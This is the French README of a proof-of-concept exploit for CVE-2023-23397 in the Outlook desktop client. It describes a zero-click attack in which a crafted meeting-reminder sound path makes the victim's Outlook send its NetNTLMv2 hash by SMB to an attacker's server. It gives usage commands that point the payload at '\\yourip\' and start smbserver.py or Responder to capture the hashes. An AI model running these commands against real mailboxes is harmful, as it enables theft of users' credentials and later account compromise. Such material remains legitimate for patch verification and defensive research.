
Simple PoC de la vulnérabilité CVE-2023-23397 avec la charge utile envoyée par email.
PoC simple et sale de la vulnérabilité CVE-2023-23397 impactant le client lourd Outlook.
Outlook souffre d'un manque de contrôle sur l'entrée utilisateur qui permet de configurer le son d'un rappel de réunion ou de rendez-vous. En effet, un attaquant peut forcer une victime à se connecter à son serveur sans aucune manipulation de l'utilisateur (vulnérabilité zero click).
Un attaquant exploitant cette vulnérabilité récupère un digest NetNTLMv2 basé sur le mot de passe de l'utilisateur piégé via une requête SMB. La requête est déclenchée dès que le courrier arrive dans la boîte de réception.
.msg.Dans une session :
python CVE-2023-23397.py
usage: CVE-2023-23397.py [-h] -p PATH
CVE-2023-23397.py: error: the following arguments are required: -p/--path
python CVE-2023-23397.py --path '\\yourip\'
Dans une seconde session (smbserver ou responder au choix).
smbserver.py -smb2support SHARE .
